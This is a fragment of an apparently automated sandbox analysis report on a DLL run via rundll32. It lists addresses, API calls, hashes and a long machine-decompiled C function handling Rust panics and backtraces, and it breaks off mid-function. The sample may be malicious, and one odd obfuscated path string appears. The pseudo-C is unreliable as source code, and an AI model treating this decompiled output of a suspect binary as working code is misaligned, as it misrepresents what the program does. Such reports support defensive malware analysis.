                                                                                                                                                                                      0x6e9de51b
                                                                                                                                                                                      0x6e9de520
                                                                                                                                                                                      0x6e9de525
                                                                                                                                                                                      0x6e9de52c
                                                                                                                                                                                      0x6e9de545
                                                                                                                                                                                      0x6e9de545
                                                                                                                                                                                      0x6e9de54e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de554
                                                                                                                                                                                      0x6e9de554
                                                                                                                                                                                      0x6e9de55c
                                                                                                                                                                                      0x6e9de579
                                                                                                                                                                                      0x6e9de579
                                                                                                                                                                                      0x6e9de57b
                                                                                                                                                                                      0x6e9de581
                                                                                                                                                                                      0x6e9de585
                                                                                                                                                                                      0x6e9de5a7
                                                                                                                                                                                      0x6e9de5ab
                                                                                                                                                                                      0x6e9de5ad
                                                                                                                                                                                      0x6e9de5b5
                                                                                                                                                                                      0x6e9de5d7
                                                                                                                                                                                      0x6e9de5d7
                                                                                                                                                                                      0x6e9de5e1
                                                                                                                                                                                      0x6e9de5e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de5b7
                                                                                                                                                                                      0x6e9de5c2
                                                                                                                                                                                      0x6e9de5ca
                                                                                                                                                                                      0x6e9de68d
                                                                                                                                                                                      0x6e9de690
                                                                                                                                                                                      0x6e9de6a6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de5d0
                                                                                                                                                                                      0x6e9de5d0
                                                                                                                                                                                      0x6e9de5d2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de5d2
                                                                                                                                                                                      0x6e9de5ca
                                                                                                                                                                                      0x6e9de587
                                                                                                                                                                                      0x6e9de592
                                                                                                                                                                                      0x6e9de59a
                                                                                                                                                                                      0x6e9de66a
                                                                                                                                                                                      0x6e9de66d
                                                                                                                                                                                      0x6e9de683
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de5a0
                                                                                                                                                                                      0x6e9de5a0
                                                                                                                                                                                      0x6e9de5a2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de5a2
                                                                                                                                                                                      0x6e9de59a
                                                                                                                                                                                      0x6e9de55e
                                                                                                                                                                                      0x6e9de564
                                                                                                                                                                                      0x6e9de56c
                                                                                                                                                                                      0x6e9de647
                                                                                                                                                                                      0x6e9de64a
                                                                                                                                                                                      0x6e9de660
                                                                                                                                                                                      0x6e9de6ae
                                                                                                                                                                                      0x6e9de6ae
                                                                                                                                                                                      0x6e9de6b4
                                                                                                                                                                                      0x6e9de6c3
                                                                                                                                                                                      0x6e9de572
                                                                                                                                                                                      0x6e9de572
                                                                                                                                                                                      0x6e9de574
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de574
                                                                                                                                                                                      0x6e9de56c
                                                                                                                                                                                      0x6e9de55c
                                                                                                                                                                                      0x6e9de52e
                                                                                                                                                                                      0x6e9de533
                                                                                                                                                                                      0x6e9de53a
                                                                                                                                                                                      0x6e9de53f
                                                                                                                                                                                      0x6e9de628
                                                                                                                                                                                      0x6e9de62d
                                                                                                                                                                                      0x6e9de632
                                                                                                                                                                                      0x6e9de637
                                                                                                                                                                                      0x6e9de646
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de53f
                                                                                                                                                                                      0x6e9de52c

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6E9DE520
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(dbghelp.dll,00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6E9DE533
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6E9DE564
                                                                                                                                                                                      • GetProcAddress.KERNEL32(SymSetOptions), ref: 6E9DE592
                                                                                                                                                                                      • GetProcAddress.KERNEL32(SymInitializeW), ref: 6E9DE5C2
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6E9DE5D7
                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,Local\RustBacktraceMutex), ref: 6E9DE5F5
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6E9DE613
                                                                                                                                                                                        • Part of subcall function 6E9DE6D0: ReleaseMutex.KERNEL32(?,6E9DE448), ref: 6E9DE6D1
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressProc$Mutex$CloseCreateCurrentHandleLibraryLoadObjectProcessReleaseSingleWait
                                                                                                                                                                                      • String ID: Local\RustBacktraceMutex$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value$dbghelp.dll
                                                                                                                                                                                      • API String ID: 1067696788-3213342004
                                                                                                                                                                                      • Opcode ID: 16b8b74e016cac712cdc3effb368ad1c9d44980211bce3fa6e70ceb54f64f936
                                                                                                                                                                                      • Instruction ID: 74fcead3dc3e2a58ba607c7bffcf34030d8be35fcb0a6112f3eb22a8b0740c56
                                                                                                                                                                                      • Opcode Fuzzy Hash: 16b8b74e016cac712cdc3effb368ad1c9d44980211bce3fa6e70ceb54f64f936
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8941CE71E04B519FEF019FF48D547AAB7A8AF56314F488438E405BB380EB34D8868F62
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                                                      			E6E9DC6D0(long _a4, signed int _a8) {
                                                                                                                                                                                      				intOrPtr _v4;
                                                                                                                                                                                      				void* _v20;
                                                                                                                                                                                      				void _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                      				void* _v40;
                                                                                                                                                                                      				char _v41;
                                                                                                                                                                                      				long _v48;
                                                                                                                                                                                      				long* _v52;
                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                      				long _v60;
                                                                                                                                                                                      				void _v64;
                                                                                                                                                                                      				long* _v68;
                                                                                                                                                                                      				long _v72;
                                                                                                                                                                                      				char _v76;
                                                                                                                                                                                      				long* _v80;
                                                                                                                                                                                      				void* _v84;
                                                                                                                                                                                      				char _v88;
                                                                                                                                                                                      				long _v92;
                                                                                                                                                                                      				char* _v96;
                                                                                                                                                                                      				long _v100;
                                                                                                                                                                                      				void* _v104;
                                                                                                                                                                                      				void** _v108;
                                                                                                                                                                                      				void* _v112;
                                                                                                                                                                                      				long _v116;
                                                                                                                                                                                      				void* _v120;
                                                                                                                                                                                      				long _v124;
                                                                                                                                                                                      				char _v128;
                                                                                                                                                                                      				intOrPtr _v132;
                                                                                                                                                                                      				void _v136;
                                                                                                                                                                                      				void* _v140;
                                                                                                                                                                                      				intOrPtr _v144;
                                                                                                                                                                                      				signed int _v148;
                                                                                                                                                                                      				intOrPtr _v152;
                                                                                                                                                                                      				intOrPtr* _t193;
                                                                                                                                                                                      				void* _t197;
                                                                                                                                                                                      				void _t198;
                                                                                                                                                                                      				intOrPtr* _t199;
                                                                                                                                                                                      				signed int _t200;
                                                                                                                                                                                      				signed int _t202;
                                                                                                                                                                                      				char* _t204;
                                                                                                                                                                                      				long _t205;
                                                                                                                                                                                      				long _t206;
                                                                                                                                                                                      				void* _t207;
                                                                                                                                                                                      				void* _t208;
                                                                                                                                                                                      				long _t209;
                                                                                                                                                                                      				void _t212;
                                                                                                                                                                                      				void _t213;
                                                                                                                                                                                      				void* _t222;
                                                                                                                                                                                      				void* _t225;
                                                                                                                                                                                      				long _t229;
                                                                                                                                                                                      				void* _t238;
                                                                                                                                                                                      				void* _t248;
                                                                                                                                                                                      				void* _t250;
                                                                                                                                                                                      				void* _t251;
                                                                                                                                                                                      				char** _t254;
                                                                                                                                                                                      				char** _t255;
                                                                                                                                                                                      				void* _t259;
                                                                                                                                                                                      				void* _t263;
                                                                                                                                                                                      				void _t268;
                                                                                                                                                                                      				char _t269;
                                                                                                                                                                                      				signed char _t271;
                                                                                                                                                                                      				void* _t274;
                                                                                                                                                                                      				void _t275;
                                                                                                                                                                                      				intOrPtr _t278;
                                                                                                                                                                                      				void* _t280;
                                                                                                                                                                                      				char* _t281;
                                                                                                                                                                                      				void _t282;
                                                                                                                                                                                      				void _t285;
                                                                                                                                                                                      				intOrPtr _t296;
                                                                                                                                                                                      				intOrPtr _t300;
                                                                                                                                                                                      				void _t303;
                                                                                                                                                                                      				long _t307;
                                                                                                                                                                                      				intOrPtr _t312;
                                                                                                                                                                                      				void* _t314;
                                                                                                                                                                                      				void* _t315;
                                                                                                                                                                                      				signed int _t316;
                                                                                                                                                                                      				signed int _t318;
                                                                                                                                                                                      				void* _t324;
                                                                                                                                                                                      				intOrPtr* _t330;
                                                                                                                                                                                      				long _t332;
                                                                                                                                                                                      				void* _t333;
                                                                                                                                                                                      				void* _t337;
                                                                                                                                                                                      				void _t338;
                                                                                                                                                                                      				void* _t340;
                                                                                                                                                                                      				void* _t341;
                                                                                                                                                                                      				void* _t342;
                                                                                                                                                                                      				void* _t343;
                                                                                                                                                                                      				void _t346;
                                                                                                                                                                                      				void* _t347;
                                                                                                                                                                                      				void* _t348;
                                                                                                                                                                                      				void* _t359;
                                                                                                                                                                                      				void* _t372;
                                                                                                                                                                                      				long _t373;
                                                                                                                                                                                      
                                                                                                                                                                                      				 *_t346 = _t274;
                                                                                                                                                                                      				_v4 = _t312;
                                                                                                                                                                                      				_t275 = _t346;
                                                                                                                                                                                      				_push(_a4);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				L1();
                                                                                                                                                                                      				_t347 = _t346 + 8;
                                                                                                                                                                                      				asm("ud2");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				asm("int3");
                                                                                                                                                                                      				_t348 = _t347 - 0x88;
                                                                                                                                                                                      				_v40 = _t348;
                                                                                                                                                                                      				_v28 = 0xffffffff;
                                                                                                                                                                                      				_v32 = E6E9E39A0;
                                                                                                                                                                                      				_t268 = _t275;
                                                                                                                                                                                      				_t340 = 1;
                                                                                                                                                                                      				_t337 = 0x6ea201dc;
                                                                                                                                                                                      				_v36 =  *[fs:0x0];
                                                                                                                                                                                      				 *[fs:0x0] =  &_v36;
                                                                                                                                                                                      				asm("lock xadd [0x6ea2e120], esi");
                                                                                                                                                                                      				_t193 = E6E9DD000(_t268, 0x6ea201dc);
                                                                                                                                                                                      				_t349 = _t193;
                                                                                                                                                                                      				if(_t193 == 0) {
                                                                                                                                                                                      					_t193 = E6E9F95A0(_t268,  &M6EA1F8F7, 0x46, _t349,  &_v68, 0x6ea1f870, 0x6ea1f9bc);
                                                                                                                                                                                      					_t348 = _t348 + 0xc;
                                                                                                                                                                                      					asm("ud2");
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t314 = _a8;
                                                                                                                                                                                      				_t278 =  *_t193 + 1;
                                                                                                                                                                                      				 *_t193 = _t278;
                                                                                                                                                                                      				if(_t340 < 0 || _t278 >= 3) {
                                                                                                                                                                                      					__eflags = _t278 - 2;
                                                                                                                                                                                      					if(__eflags <= 0) {
                                                                                                                                                                                      						_v124 = 0x6ea1f570;
                                                                                                                                                                                      						_v120 = 0x6ea1f824;
                                                                                                                                                                                      						_v68 = 0x6ea20260;
                                                                                                                                                                                      						_v64 = 2;
                                                                                                                                                                                      						_v96 = 0;
                                                                                                                                                                                      						_v100 = 0;
                                                                                                                                                                                      						_v60 = 0;
                                                                                                                                                                                      						_v116 = _a4;
                                                                                                                                                                                      						_v112 = _t314;
                                                                                                                                                                                      						_t315 =  &_v68;
                                                                                                                                                                                      						_v80 =  &_v124;
                                                                                                                                                                                      						_v76 = E6E9D2470;
                                                                                                                                                                                      						_v52 =  &_v80;
                                                                                                                                                                                      						_v48 = 1;
                                                                                                                                                                                      						_t197 = E6E9DD0F0( &_v100, __eflags);
                                                                                                                                                                                      						__eflags = _t197 - 3;
                                                                                                                                                                                      						if(_t197 == 3) {
                                                                                                                                                                                      							_v20 = 0;
                                                                                                                                                                                      							_v36 = _t315;
                                                                                                                                                                                      							 *((intOrPtr*)( *((intOrPtr*)(_t315 + 4))))( *_t315);
                                                                                                                                                                                      							_t348 = _t348 + 4;
                                                                                                                                                                                      							L12:
                                                                                                                                                                                      							_t340 = _v36;
                                                                                                                                                                                      							_t307 =  *(_t340 + 4);
                                                                                                                                                                                      							__eflags =  *(4 + _t307);
                                                                                                                                                                                      							if( *(4 + _t307) != 0) {
                                                                                                                                                                                      								HeapFree( *0x6ea2e128, 0, _t259);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t197 = HeapFree( *0x6ea2e128, 0, _t340);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t333 =  &_v68;
                                                                                                                                                                                      					_v68 = 0x6ea20224;
                                                                                                                                                                                      					_v64 = 1;
                                                                                                                                                                                      					_v60 = 0;
                                                                                                                                                                                      					_v52 = 0x6ea1f570;
                                                                                                                                                                                      					_v120 = 0;
                                                                                                                                                                                      					_v124 = 0;
                                                                                                                                                                                      					_v48 = 0;
                                                                                                                                                                                      					_t197 = E6E9DD0F0( &_v124, __eflags);
                                                                                                                                                                                      					__eflags = _t197 - 3;
                                                                                                                                                                                      					if(_t197 != 3) {
                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_v20 = 1;
                                                                                                                                                                                      						_v36 = _t333;
                                                                                                                                                                                      						 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
                                                                                                                                                                                      						_t348 = _t348 + 4;
                                                                                                                                                                                      						goto L12;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_v132 = _t278;
                                                                                                                                                                                      					__imp__AcquireSRWLockShared(0x6ea2e11c);
                                                                                                                                                                                      					_v144 = 0x6ea2e11c;
                                                                                                                                                                                      					_v20 = 2;
                                                                                                                                                                                      					_v136 = _t268;
                                                                                                                                                                                      					_v140 = _t337;
                                                                                                                                                                                      					_t263 =  *((intOrPtr*)(_t337 + 0x10))(_t268);
                                                                                                                                                                                      					_t348 = _t348 + 4;
                                                                                                                                                                                      					_v36 = _t263;
                                                                                                                                                                                      					_v40 = _t314;
                                                                                                                                                                                      					_t197 = E6E9DD000(_t268, _t337);
                                                                                                                                                                                      					_t337 = _v40;
                                                                                                                                                                                      					_t352 = _t197;
                                                                                                                                                                                      					if(_t197 != 0) {
                                                                                                                                                                                      						L18:
                                                                                                                                                                                      						__eflags =  *_t197 - 1;
                                                                                                                                                                                      						_t280 = 1;
                                                                                                                                                                                      						if( *_t197 <= 1) {
                                                                                                                                                                                      							_t198 =  *0x6ea2e110; // 0x0
                                                                                                                                                                                      							_t316 = _a8;
                                                                                                                                                                                      							__eflags = _t198 - 2;
                                                                                                                                                                                      							if(_t198 == 2) {
                                                                                                                                                                                      								_t280 = 0;
                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t198 - 1;
                                                                                                                                                                                      							if(_t198 == 1) {
                                                                                                                                                                                      								_t280 = 4;
                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t198;
                                                                                                                                                                                      							if(_t198 != 0) {
                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							E6E9DD380(_t268,  &_v68, _t337, _t340);
                                                                                                                                                                                      							_t337 = _v40;
                                                                                                                                                                                      							_t251 = _v68;
                                                                                                                                                                                      							__eflags = _t251;
                                                                                                                                                                                      							if(_t251 != 0) {
                                                                                                                                                                                      								goto L69;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t271 = 5;
                                                                                                                                                                                      							goto L87;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t316 = _a8;
                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						E6E9F95A0(_t268,  &M6EA1F8F7, 0x46, _t352,  &_v68, 0x6ea1f870, 0x6ea1f9bc);
                                                                                                                                                                                      						_t348 = _t348 + 0xc;
                                                                                                                                                                                      						L62:
                                                                                                                                                                                      						asm("ud2");
                                                                                                                                                                                      						L63:
                                                                                                                                                                                      						_t281 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
                                                                                                                                                                                      						_t204 = 0xc;
                                                                                                                                                                                      						L22:
                                                                                                                                                                                      						_v100 = _t281;
                                                                                                                                                                                      						_v96 = _t204;
                                                                                                                                                                                      						_t205 =  *0x6ea2d044; // 0x0
                                                                                                                                                                                      						if(_t205 == 0) {
                                                                                                                                                                                      							_t285 = 0x6ea2d044;
                                                                                                                                                                                      							_t205 = E6E9E2960(_t268, 0x6ea2d044, _t337, _t340);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t197 = TlsGetValue(_t205);
                                                                                                                                                                                      						if(_t197 <= 1) {
                                                                                                                                                                                      							L43:
                                                                                                                                                                                      							_t206 =  *0x6ea2d044; // 0x0
                                                                                                                                                                                      							__eflags = _t206;
                                                                                                                                                                                      							if(_t206 == 0) {
                                                                                                                                                                                      								_t285 = 0x6ea2d044;
                                                                                                                                                                                      								_t206 = E6E9E2960(_t268, 0x6ea2d044, _t337, _t340);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t197 = TlsGetValue(_t206);
                                                                                                                                                                                      							__eflags = _t197;
                                                                                                                                                                                      							if(_t197 == 0) {
                                                                                                                                                                                      								_t207 =  *0x6ea2e128; // 0x2a40000
                                                                                                                                                                                      								__eflags = _t207;
                                                                                                                                                                                      								if(_t207 != 0) {
                                                                                                                                                                                      									L67:
                                                                                                                                                                                      									_t208 = HeapAlloc(_t207, 0, 0x10);
                                                                                                                                                                                      									__eflags = _t208;
                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                      										 *_t208 = 0;
                                                                                                                                                                                      										 *(_t208 + 0xc) = 0x6ea2d044;
                                                                                                                                                                                      										_t340 = _t208;
                                                                                                                                                                                      										_t209 =  *0x6ea2d044; // 0x0
                                                                                                                                                                                      										__eflags = _t209;
                                                                                                                                                                                      										if(_t209 == 0) {
                                                                                                                                                                                      											_v36 = _t340;
                                                                                                                                                                                      											_t209 = E6E9E2960(_t268, 0x6ea2d044, _t337, _t340);
                                                                                                                                                                                      											_t340 = _v36;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t197 = TlsSetValue(_t209, _t340);
                                                                                                                                                                                      										goto L76;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									L68:
                                                                                                                                                                                      									_t251 = E6E9F92F0(_t268, 0x10, 4, _t337, _t340, __eflags);
                                                                                                                                                                                      									asm("ud2");
                                                                                                                                                                                      									L69:
                                                                                                                                                                                      									_t332 = _v60;
                                                                                                                                                                                      									_t303 = _v64;
                                                                                                                                                                                      									__eflags = _t332 - 4;
                                                                                                                                                                                      									if(_t332 == 4) {
                                                                                                                                                                                      										__eflags =  *_t251 - 0x6c6c7566;
                                                                                                                                                                                      										if( *_t251 != 0x6c6c7566) {
                                                                                                                                                                                      											L84:
                                                                                                                                                                                      											_t340 = 2;
                                                                                                                                                                                      											_t271 = 0;
                                                                                                                                                                                      											__eflags = 0;
                                                                                                                                                                                      											L85:
                                                                                                                                                                                      											__eflags = _t303;
                                                                                                                                                                                      											if(_t303 != 0) {
                                                                                                                                                                                      												HeapFree( *0x6ea2e128, 0, _t251);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L87:
                                                                                                                                                                                      											__eflags = _t271 - 5;
                                                                                                                                                                                      											_t316 = _a8;
                                                                                                                                                                                      											_t273 =  !=  ? _t340 : 1;
                                                                                                                                                                                      											_t280 =  !=  ? _t271 & 0x000000ff : 4;
                                                                                                                                                                                      											_t144 =  !=  ? _t340 : 1;
                                                                                                                                                                                      											_t268 =  *0x6ea2e110;
                                                                                                                                                                                      											 *0x6ea2e110 =  !=  ? _t340 : 1;
                                                                                                                                                                                      											L20:
                                                                                                                                                                                      											_v148 = _t316;
                                                                                                                                                                                      											_v128 = _t280;
                                                                                                                                                                                      											_t61 = _t337 + 0xc; // 0x6e9e3290
                                                                                                                                                                                      											_t199 =  *_t61;
                                                                                                                                                                                      											_v40 = _t199;
                                                                                                                                                                                      											_t200 =  *_t199(_v36);
                                                                                                                                                                                      											_t348 = _t348 + 4;
                                                                                                                                                                                      											_t318 = _t316 ^ 0x7ef2a91e | _t200 ^ 0xecc7bcf4;
                                                                                                                                                                                      											__eflags = _t318;
                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                      												_t202 = _v40(_v36);
                                                                                                                                                                                      												_t348 = _t348 + 4;
                                                                                                                                                                                      												__eflags = _t318 ^ 0xe43a67d8 | _t202 ^ 0xbae7a625;
                                                                                                                                                                                      												if(__eflags != 0) {
                                                                                                                                                                                      													goto L63;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t254 = _v36;
                                                                                                                                                                                      												_t281 =  *_t254;
                                                                                                                                                                                      												_t204 = _t254[2];
                                                                                                                                                                                      												goto L22;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t255 = _v36;
                                                                                                                                                                                      											_t281 =  *_t255;
                                                                                                                                                                                      											_t204 = _t255[1];
                                                                                                                                                                                      											goto L22;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t271 = 1;
                                                                                                                                                                                      										_t340 = 3;
                                                                                                                                                                                      										goto L85;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags = _t332 - 1;
                                                                                                                                                                                      									if(_t332 != 1) {
                                                                                                                                                                                      										goto L84;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags =  *_t251 - 0x30;
                                                                                                                                                                                      									if( *_t251 != 0x30) {
                                                                                                                                                                                      										goto L84;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t271 = 4;
                                                                                                                                                                                      									_t340 = 1;
                                                                                                                                                                                      									goto L85;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t207 = GetProcessHeap();
                                                                                                                                                                                      								__eflags = _t207;
                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                      									goto L68;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *0x6ea2e128 = _t207;
                                                                                                                                                                                      								goto L67;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t340 = _t197;
                                                                                                                                                                                      								__eflags = _t197 - 1;
                                                                                                                                                                                      								if(_t197 != 1) {
                                                                                                                                                                                      									L76:
                                                                                                                                                                                      									_t282 =  *(_t340 + 8);
                                                                                                                                                                                      									__eflags =  *_t340;
                                                                                                                                                                                      									_t138 = _t340 + 4; // 0x4
                                                                                                                                                                                      									_t337 = _t138;
                                                                                                                                                                                      									 *_t340 = 1;
                                                                                                                                                                                      									 *(_t340 + 4) = 0;
                                                                                                                                                                                      									 *(_t340 + 8) = 0;
                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                      										__eflags = _t282;
                                                                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                                                                      											asm("lock dec dword [ecx]");
                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                      												_t197 = E6E9DC640(_t282);
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L27;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_v84 = 0;
                                                                                                                                                                                      								_v36 = 0;
                                                                                                                                                                                      								_t213 = 0;
                                                                                                                                                                                      								__eflags = 0;
                                                                                                                                                                                      								goto L48;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t337 = _t197;
                                                                                                                                                                                      							if( *_t197 != 1) {
                                                                                                                                                                                      								goto L43;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t337 = _t337 + 4;
                                                                                                                                                                                      							L27:
                                                                                                                                                                                      							if( *_t337 != 0) {
                                                                                                                                                                                      								E6E9F95A0(_t268, "already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd", 0x10, __eflags,  &_v68, 0x6ea1f860, 0x6ea1ff30);
                                                                                                                                                                                      								_t348 = _t348 + 0xc;
                                                                                                                                                                                      								goto L62;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *_t337 = 0xffffffff;
                                                                                                                                                                                      							_t340 =  *(_t337 + 4);
                                                                                                                                                                                      							if(_t340 == 0) {
                                                                                                                                                                                      								_v36 = _t337;
                                                                                                                                                                                      								_v20 = 8;
                                                                                                                                                                                      								_t250 = E6E9DC4D0(_t268, _t337, _t340);
                                                                                                                                                                                      								_t337 = _v36;
                                                                                                                                                                                      								_t340 = _t250;
                                                                                                                                                                                      								_t197 =  *(_t337 + 4);
                                                                                                                                                                                      								_t359 = _t197;
                                                                                                                                                                                      								if(_t359 != 0) {
                                                                                                                                                                                      									asm("lock dec dword [eax]");
                                                                                                                                                                                      									if(_t359 == 0) {
                                                                                                                                                                                      										_t285 =  *(_t337 + 4);
                                                                                                                                                                                      										_t197 = E6E9DC640(_t285);
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *(_t337 + 4) = _t340;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							asm("lock inc dword [esi]");
                                                                                                                                                                                      							if(_t359 <= 0) {
                                                                                                                                                                                      								L17:
                                                                                                                                                                                      								asm("ud2");
                                                                                                                                                                                      								asm("ud2");
                                                                                                                                                                                      								goto L18;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *_t337 =  *_t337 + 1;
                                                                                                                                                                                      								_v84 = _t340;
                                                                                                                                                                                      								_v36 = _t340;
                                                                                                                                                                                      								if(_t340 != 0) {
                                                                                                                                                                                      									_t212 =  *(_t340 + 0x10);
                                                                                                                                                                                      									__eflags = _t212;
                                                                                                                                                                                      									_t285 =  ==  ? _t212 : _t340 + 0x10;
                                                                                                                                                                                      									__eflags = _t285;
                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                      										L104:
                                                                                                                                                                                      										_t213 =  *_t285;
                                                                                                                                                                                      										_t285 =  *((intOrPtr*)(4 + _t285)) - 1;
                                                                                                                                                                                      										L105:
                                                                                                                                                                                      										_v20 = 3;
                                                                                                                                                                                      										L48:
                                                                                                                                                                                      										_v124 = 0x6ea2010c;
                                                                                                                                                                                      										_v120 = 4;
                                                                                                                                                                                      										_v72 = 0;
                                                                                                                                                                                      										_v88 = 0;
                                                                                                                                                                                      										_v92 = 0;
                                                                                                                                                                                      										_v116 = 0;
                                                                                                                                                                                      										_v20 = 3;
                                                                                                                                                                                      										_t323 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
                                                                                                                                                                                      										_t215 =  !=  ? _t285 : 9;
                                                                                                                                                                                      										_v80 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
                                                                                                                                                                                      										_t324 =  &_v124;
                                                                                                                                                                                      										_v76 =  !=  ? _t285 : 9;
                                                                                                                                                                                      										_v68 =  &_v80;
                                                                                                                                                                                      										_v64 = 0x6e9ddca0;
                                                                                                                                                                                      										_v60 =  &_v100;
                                                                                                                                                                                      										_v56 = 0x6e9ddca0;
                                                                                                                                                                                      										_v52 =  &_v148;
                                                                                                                                                                                      										_v48 = E6E9DDCC0;
                                                                                                                                                                                      										_v108 =  &_v68;
                                                                                                                                                                                      										_v104 = 3;
                                                                                                                                                                                      										if(E6E9DD0F0( &_v92, _t213) == 3) {
                                                                                                                                                                                      											_v20 = 7;
                                                                                                                                                                                      											_v40 = _t324;
                                                                                                                                                                                      											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
                                                                                                                                                                                      											_t348 = _t348 + 4;
                                                                                                                                                                                      											_t343 = _v40;
                                                                                                                                                                                      											_t300 =  *((intOrPtr*)(_t343 + 4));
                                                                                                                                                                                      											if( *((intOrPtr*)(_t300 + 4)) != 0) {
                                                                                                                                                                                      												_t248 =  *_t343;
                                                                                                                                                                                      												if( *((intOrPtr*)(_t300 + 8)) >= 9) {
